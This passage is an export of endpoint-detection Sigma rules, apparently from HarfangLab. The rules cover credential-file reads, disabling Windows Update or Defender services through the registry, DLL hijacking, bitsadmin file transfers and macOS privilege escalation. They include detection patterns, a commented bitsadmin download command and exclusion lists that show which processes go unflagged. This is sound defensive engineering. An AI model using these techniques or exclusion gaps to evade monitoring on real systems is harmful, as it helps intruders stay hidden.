"rule_description": "Detects a process reading sensitive files related to the 1Password password manager.\nAdversaries may read the user's password in order to gather credentials and impersonate users on multiple services.\nIt is recommended to verify if the process performing the read operation has legitimate reasons to do so.\n",
"rule_creation_date": "2024-06-18",
"rule_modified_date": "2025-10-29",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1555.005"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5f142996-9dfb-41b9-8493-a4b55a4f6ebe",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.621296Z",
"creation_date": "2026-03-23T11:45:34.621298Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.621302Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1112/"
],
"name": "t1112_disable_autoupdate_registry.yml",
"content": "title: Windows Update Disabled via Registry\nid: 5f142996-9dfb-41b9-8493-a4b55a4f6ebe\ndescription: |\n Detects when Windows updates are disabled by setting a specific registry key.\n Adversaries may disable Windows automatic updates to weaken the security level of the target during long time engagement.\n It is recommended to check if this action is intended or if updates are installed by another mean on the impacted system.\nreferences:\n - https://attack.mitre.org/techniques/T1112/\ndate: 2023/12/27\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.ImpairDefenses\n - classification.Windows.Behavior.SystemModification\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: 'SetValue'\n TargetObject: 'HKLM\\Software\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU\\NoAutoUpdate'\n Details|contains: '?WORD' # Any non-zero value works, not just DWORD (0x00000001)\n ProcessParentImage|contains: '?'\n\n filter_zero:\n Details: '?WORD (0x00000000)'\n\n exclusion_programfiles:\n ProcessImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_image:\n - ProcessImage: 
'?:\\Windows\\System32\\uwfmgr.exe'\n - ProcessParentImage:\n - '?:\\Program Files (x86)\\wapt\\waptservice.exe'\n - '?:\\wapt\\waptservice.exe'\n - ProcessGrandparentImage:\n - '?:\\Program Files\\ATERA Networks\\AteraAgent\\\\*\\AgentPackageSystemTools\\AgentPackageSystemTools.exe'\n - '?:\\Windows\\CCM\\CcmExec.exe'\n - '?:\\Windows\\Action1\\action1_agent.exe'\n\n exclusion_deviceenroller:\n ProcessImage: '?:\\Windows\\System32\\DeviceEnroller.exe'\n ProcessCommandLine|contains|all:\n - ' /o '\n - ' /c /b'\n ProcessParentCommandLine:\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p -s Schedule'\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n\n exclusion_centrastage1:\n ProcessProcessName: 'CagService.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Datto Inc'\n exclusion_centrastage2:\n ProcessParentCommandLine|startswith:\n - 'powershell -executionpolicy bypass & ??:\\ProgramData\\CentraStage\\Packages\\'\n - '?:\\WINDOWS\\system32\\cmd.exe /c ?:\\ProgramData\\CentraStage\\Packages\\'\n\n exclusion_patchman:\n ProcessProcessName: 'PME.Agent.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'N-ABLE TECHNOLOGIES LTD'\n\n exclusion_fsecure:\n ProcessProcessName: 'fssua.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'WithSecure Oyj'\n - 'F-Secure Corporation'\n\n exclusion_ninjarmmagent:\n ProcessImage|endswith: '\\NinjaRMMAgent.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'NinjaRMM, LLC'\n\n exclusion_labtech:\n ProcessImage|endswith: '\\LTSVC.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Connectwise, LLC'\n\n exclusion_zoomroom:\n ProcessImage|endswith:\n - '\\zJob.exe'\n - '\\ZoomRooms.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Zoom Video Communications, Inc.'\n\n exclusion_winbootstrap:\n - ProcessParentImage|endswith: '\\TSManager.exe'\n ProcessParentSigned: 'true'\n ProcessParentSignature: 'Microsoft Corporation'\n - ProcessParentImage|endswith: 'TSMBootstrap.exe'\n ProcessParentSigned: 'true'\n ProcessParentSignature: 
'Microsoft Corporation'\n - ProcessGrandparentImage|endswith: '\\TSManager.exe'\n ProcessGrandparentSigned: 'true'\n ProcessGrandparentSignature: 'Microsoft Corporation'\n - ProcessGrandparentImage|endswith: 'TSMBootstrap.exe'\n ProcessGrandparentSigned: 'true'\n ProcessGrandparentSignature: 'Microsoft Corporation'\n\n exclusion_automox:\n - ProcessParentImage:\n - '?:\\Program Files (x86)\\Automox\\amagent.exe'\n - '?:\\Program Files\\Automox\\amagent.exe'\n ProcessParentSigned: 'true'\n ProcessParentSignature: 'Automox Inc.'\n - ProcessGrandparentImage:\n - '?:\\Program Files (x86)\\Automox\\amagent.exe'\n - '?:\\Program Files\\Automox\\amagent.exe'\n ProcessGrandparentSigned: 'true'\n ProcessGrandparentSignature: 'Automox Inc.'\n\n exclusion_mmragent:\n ProcessImage: '?:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\ServicePortalAgent\\app-*\\emulator\\MmrAgent.NetFxEmulator.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Corporation'\n\n exclusion_ninjarmm:\n ProcessName: 'NinjaRMMAgent.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'NinjaOne LLC'\n\n exclusion_netfxemulator:\n ProcessName: 'MmrAgent.NetFxEmulator.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Corporation'\n\n exclusion_matrix42:\n - ProcessName: 'setup*.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Matrix42 GmbH'\n - ProcessGrandparentProduct: 'Matrix42 Empirum'\n ProcessGrandparentSigned: 'true'\n ProcessGrandparentSignature: 'Matrix42 GmbH'\n\n exclusion_serviceportalagent:\n ProcessName: 'ServicePortalAgent.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Corporation'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5f142996-9dfb-41b9-8493-a4b55a4f6ebe",
"rule_name": "Windows Update Disabled via Registry",
"rule_description": "Detects when Windows automatic updates are disabled by setting the NoAutoUpdate value under the WindowsUpdate policy key to a non-zero value.\nAdversaries may disable Windows automatic updates to weaken the security posture of the target during long-term engagements.\nIt is recommended to check whether this action is intended (for example, applied by Group Policy or by a patch-management agent, both of which this rule excludes) or whether updates are installed by other means on the impacted system.\nNote that the rule also excludes any process whose image is located under Program Files or Program Files (x86), so changes made by software installed there are not reported and should be reviewed through other means.\n",
"rule_creation_date": "2023-12-27",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1112"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5f3ad336-0099-4bfb-af9d-258421e51d68",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.593036Z",
"creation_date": "2026-03-23T11:45:34.593040Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.593047Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_bthudtask.yml",
"content": "title: DLL Hijacking via bthudtask.exe\nid: 5f3ad336-0099-4bfb-af9d-258421e51d68\ndescription: |\n Detects potential Windows DLL Hijacking via bthudtask.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'bthudtask.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\DEVOBJ.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5f3ad336-0099-4bfb-af9d-258421e51d68",
"rule_name": "DLL Hijacking via bthudtask.exe",
"rule_description": "Detects potential Windows DLL hijacking via bthudtask.exe (a DEVOBJ.dll load by a Windows-signed bthudtask.exe running outside the system directories).\nDLL hijacking takes advantage of the default Windows DLL search order by placing a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL in the same folder.\nLoads where either the process image or the loaded library resides under System32, SysWOW64 or WinSxS, or where the library is signed by Microsoft Windows, are filtered out.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5f492e12-e643-41a2-a377-b8d8a2886883",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.085427Z",
"creation_date": "2026-03-23T11:45:34.085429Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.085433Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/",
"https://docs.microsoft.com/windows/win32/bits/about-bits",
"https://attack.mitre.org/techniques/T1197/",
"https://attack.mitre.org/techniques/T1105/",
"https://attack.mitre.org/software/S0190/"
],
"name": "t1197_bitsadmin_download.yml",
"content": "title: File Downloaded or Exfiltrated via BITS\nid: 5f492e12-e643-41a2-a377-b8d8a2886883\ndescription: |\n Detects a suspicious attempt to download, copy or exfiltrate files and data using bitsadmin.\n Bitsadmin is a tool to manage the Background Intelligent Transfer Service (BITS) which is used to download files from or upload files to HTTP web servers and SMB file shares.\n This service is an asynchronous file transfer mechanism and is often used by attackers to download malicious files, exfiltrate data or maintain persistence.\n By default, BITS jobs have a 90 days maximum lifetime if complete or cancel methods are not called.\n It is recommended to check the file that has been downloaded via the job for malicious content.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/\n - https://docs.microsoft.com/windows/win32/bits/about-bits\n - https://attack.mitre.org/techniques/T1197/\n - https://attack.mitre.org/techniques/T1105/\n - https://attack.mitre.org/software/S0190/\ndate: 2021/05/10\nmodified: 2025/02/18\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1197\n - attack.command_and_control\n - attack.t1105\n - attack.s0190\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Bitsadmin\n - classification.Windows.Behavior.FileDownload\n - classification.Windows.Behavior.Exfiltration\nlogsource:\n category: process_creation\n product: windows\ndetection:\n # bitsadmin /transfer \n\n # bitsadmin /create 1\n # bitsadmin /addfile 1 https://live.sysinternals.com/procdump.exe c:\\Windows\\Temp\\autoruns.exe\n # bitsadmin /resume 1\n # bitsadmin /complete 1\n\n # bitsadmin /create 1\n # bitsadmin /addfile 1 c:\\windows\\system32\\cmd.exe c:\\Windows\\temp\\cmd.exe\n # bitsadmin /resume 1\n # bitsadmin /complete 1\n selection_bin:\n - Image|endswith: '\\bitsadmin.exe'\n - OriginalFileName: 'bitsadmin.exe'\n\n selection_cmd:\n CommandLine|contains:\n - 'transfer'\n - 'addfile'\n\n 
condition: all of selection_*\nlevel: medium\nconfidence: moderate",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5f492e12-e643-41a2-a377-b8d8a2886883",
"rule_name": "File Downloaded or Exfiltrated via BITS",
"rule_description": "Detects a suspicious attempt to download, copy or exfiltrate files and data using bitsadmin.\nBitsadmin is a command-line tool to manage the Background Intelligent Transfer Service (BITS), which is used to download files from or upload files to HTTP web servers and SMB file shares.\nThis service is an asynchronous file transfer mechanism and is often used by attackers to download malicious files, exfiltrate data or maintain persistence.\nBy default, BITS jobs have a 90-day maximum lifetime if the complete or cancel methods are not called.\nIt is recommended to check the file downloaded via the job for malicious content and, for upload jobs, to identify the remote destination.\nNote that this rule only matches bitsadmin.exe command lines containing 'transfer' or 'addfile'; BITS jobs created through other interfaces are not covered by it.\n",
"rule_creation_date": "2021-05-10",
"rule_modified_date": "2025-02-18",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1105",
"attack.t1197"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5f531d46-6898-4826-9350-6c5c294eabee",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.626016Z",
"creation_date": "2026-03-23T11:45:34.626018Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.626022Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://objective-see.org/blog/blog_0x56.html",
"https://www.jamf.com/blog/detecting-insecure-application-updates-on-macos/",
"https://attack.mitre.org/techniques/T1548/",
"https://attack.mitre.org/techniques/T1548/004/"
],
"name": "t1548_004_security_authtrampoline_execution.yml",
"content": "title: Privilege Escalation via security_authtrampoline\nid: 5f531d46-6898-4826-9350-6c5c294eabee\ndescription: |\n Detects the execution of security_authtrampoline with a suspicious ancestor process.\n Adversaries may leverage the AuthorizationExecuteWithPrivileges API to escalate privileges by prompting the user for credentials.\n It is recommended to check behavior of any children of security_authtrampoline and its parents for any suspicious activity.\nreferences:\n - https://objective-see.org/blog/blog_0x56.html\n - https://www.jamf.com/blog/detecting-insecure-application-updates-on-macos/\n - https://attack.mitre.org/techniques/T1548/\n - https://attack.mitre.org/techniques/T1548/004/\ndate: 2024/07/23\nmodified: 2025/12/29\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1548.004\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.PrivilegeEscalation\n - classification.macOS.Behavior.ProxyExecution\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n ProcessName: 'security_authtrampoline'\n ProcessAncestors|contains:\n # folder\n - '/users/shared/'\n - '/private/tmp/'\n - '/private/var/tmp/'\n - '/private/etc/'\n - '/private/var/root/'\n - '/Volumes/'\n # process\n - 'osascript'\n - 'python'\n - 'perl'\n - 'ruby'\n - 'bash'\n - '/sh'\n - 'zsh'\n - 'com.apple.automator.runner'\n\n exclusion_launchd_script:\n ProcessAncestors|endswith: '|/bin/bash|/sbin/launchd'\n\n exclusion_red_giant_install:\n ProcessCommandLine|contains: '/var/folders/*/installer/Red Giant Installer/Red Giant Installer.app/Contents/MacOS/'\n\n exclusion_maxon:\n ProcessParentImage:\n - '/private/var/folders/*/installer/Universe Installer/Universe Installer.app/Contents/MacOS/Universe'\n - '/private/var/folders/*/installer/Red Giant Installer/Red Giant Installer.app/Contents/MacOS/Red Giant'\n ProcessCommandLine:\n - '/usr/libexec/security_authtrampoline /var/folders/*/installer/Universe 
Installer/Universe Installer.app/Contents/MacOS/osx-arm64 auth 4'\n - '/usr/libexec/security_authtrampoline /var/folders/*/installer/Red Giant Installer/Red Giant Installer.app/Contents/MacOS/osx-arm64 auth 4'\n\n exclusion_commandline:\n ProcessCommandLine:\n - '/usr/libexec/security_authtrampoline /bin/chmod auth * /Library/*'\n - '/usr/libexec/security_authtrampoline /bin/chmod auth * /Applications/*'\n - '/usr/libexec/security_authtrampoline /usr/sbin/chown auth * /Library/*'\n - '/usr/libexec/security_authtrampoline /usr/sbin/chown auth * /Applications/*'\n - '/usr/libexec/security_authtrampoline /bin/mkdir auth * /Library/*'\n - '/usr/libexec/security_authtrampoline /bin/mkdir auth * /Applications/*'\n - '/usr/libexec/security_authtrampoline /bin/rm auth */Library/*'\n - '/usr/libexec/security_authtrampoline /bin/rm auth */Applications/*'\n - '/usr/libexec/security_authtrampoline /usr/bin/ditto auth * /Volumes/* /Applications/*'\n - '/usr/libexec/security_authtrampoline /Volumes/Uninstall Kaspersky/Kaspersky Uninstaller.app/*'\n - '/usr/libexec/security_authtrampoline /bin/bash auth 3 -p -c /usr/bin/sudo /bin/launchctl remove com.bomgar.bomgar-*'\n - '/usr/libexec/security_authtrampoline /var/folders/*/Maxon Cinema 4D/Maxon Cinema 4D Installer.app/Contents/MacOS/osx-arm64 auth 4'\n - '/usr/libexec/security_authtrampoline /var/folders/*/Update/GeoComplyUpdate *'\n - '/usr/libexec/security_authtrampoline * remove com.bomgar.bomgar-ps-*'\n - '/usr/libexec/security_authtrampoline /Applications/ESET Endpoint Antivirus.app/*'\n - '/usr/libexec/security_authtrampoline /tmp/TempPrinterDriverFiles/Common/PerformOperations.app/*'\n\n exclusion_image:\n ProcessParentImage:\n - '/Volumes/Tunnelblick/Tunnelblick.app/Contents/MacOS/Tunnelblick'\n - '/Volumes/FXConsole_*_Installer.app/FXConsole_*_Installer.app/Contents/MacOS/vcinstaller'\n - '/private/tmp/*/Creative Cloud Installer.app/Contents/MacOS/Install'\n - '/Volumes/*/Adobe Creative Cloud Cleaner 
Tool.app/Contents/MacOS/Adobe Creative Cloud Cleaner Tool'\n - '/Volumes/EndNote Cite While You Write Installer/Install Cite While You Write.app/Contents/MacOS/Install Cite While You Write'\n - '/usr/local/McAfee/AntiMalware/AntiMalwareUpdate'\n - '/Users/Shared/Battle.net/Agent/Agent.app/Contents/MacOS/Switcher'\n - '/Volumes/Rescue HD/*/Wondershare Recoverit™ */Recoverit.app/Contents/MacOS/Recoverit'\n - '/Volumes/Chaos License Server/vrlservice_darwin.bin.app/Contents/MacOS/vrlservice_darwin.bin'\n - '/Volumes/Chaos License Server ?/vrlservice_darwin.bin.app/Contents/MacOS/vrlservice_darwin.bin'\n - '/Applications/Chaos/Cosmos/uninstall/installer'\n - '/Volumes/Perfection V850/EPSON.app/Contents/MacOS/EpsonInstaller'\n\n exclusion_mapple:\n ProcessCommandLine|startswith: '/usr/libexec/security_authtrampoline /tmp/Maple*MacUpgrade.app/Contents/MacOS/osx-x86_64'\n ProcessParentImage: '/private/tmp/Maple*MacUpgrade.app/Contents/MacOS/Maple'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5f531d46-6898-4826-9350-6c5c294eabee",
"rule_name": "Privilege Escalation via security_authtrampoline",
"rule_description": "Detects the execution of security_authtrampoline with a suspicious ancestor process: a scripting interpreter or shell, or a process running from a temporary, shared, root or mounted-volume location.\nAdversaries may leverage the AuthorizationExecuteWithPrivileges API to escalate privileges by prompting the user for credentials.\nIt is recommended to check the behavior of any child processes of security_authtrampoline and of its parent processes for suspicious activity, and to verify the legitimacy of the binary passed on the security_authtrampoline command line.\n",
"rule_creation_date": "2024-07-23",
"rule_modified_date": "2025-12-29",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1548.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5f5b5009-39f7-48b4-894b-e553e54476eb",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.621724Z",
"creation_date": "2026-03-23T11:45:34.621726Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.621730Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/",
"https://attack.mitre.org/techniques/T1562/001/",
"https://attack.mitre.org/techniques/T1112/"
],
"name": "t1562_001_sensitive_service_disabled.yml",
"content": "title: Sensitive Service Disabled\nid: 5f5b5009-39f7-48b4-894b-e553e54476eb\ndescription: |\n Detects sensitive services such as Windows Defender or HarfangLab being disabled via a registry modification.\n Adversaries may disable sensitive services to try and avoid detection of their malicious activities.\n It is recommended to analyze the process responsible for the registry modification as well as to look for other suspicious actions on the host.\nreferences:\n - https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/\n - https://attack.mitre.org/techniques/T1562/001/\n - https://attack.mitre.org/techniques/T1112/\ndate: 2024/09/06\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.ImpairDefenses\n - classification.Windows.Behavior.SystemModification\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject:\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\WdBoot\\Start'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\WdFilter\\Start'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\WdNisDrv\\Start'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\WdNisSvc\\Start'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\hlab_hurukai\\Start'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\hlprotect\\Start'\n Details: 'DWORD (0x00000004)' # SERVICE_DISABLED\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - 
'?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n # Hlab is disabling itself when updating..\n exclusion_services:\n ProcessImage: '?:\\Windows\\System32\\services.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5f5b5009-39f7-48b4-894b-e553e54476eb",
"rule_name": "Sensitive Service Disabled",
"rule_description": "Detects sensitive services such as Windows Defender or HarfangLab being disabled (Start value set to SERVICE_DISABLED) via a registry modification.\nAdversaries may disable sensitive services to try and avoid detection of their malicious activities.\nIt is recommended to analyze the process responsible for the registry modification as well as to look for other suspicious actions on the host.\nNote that modifications written by services.exe (the Service Control Manager) and by the Group Policy client are excluded, so Start-value changes applied through those components rather than by a direct registry write are not reported by this rule.\n",
"rule_creation_date": "2024-09-06",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1562.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5f96cb48-bf55-484f-badd-d9da662dabd7",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
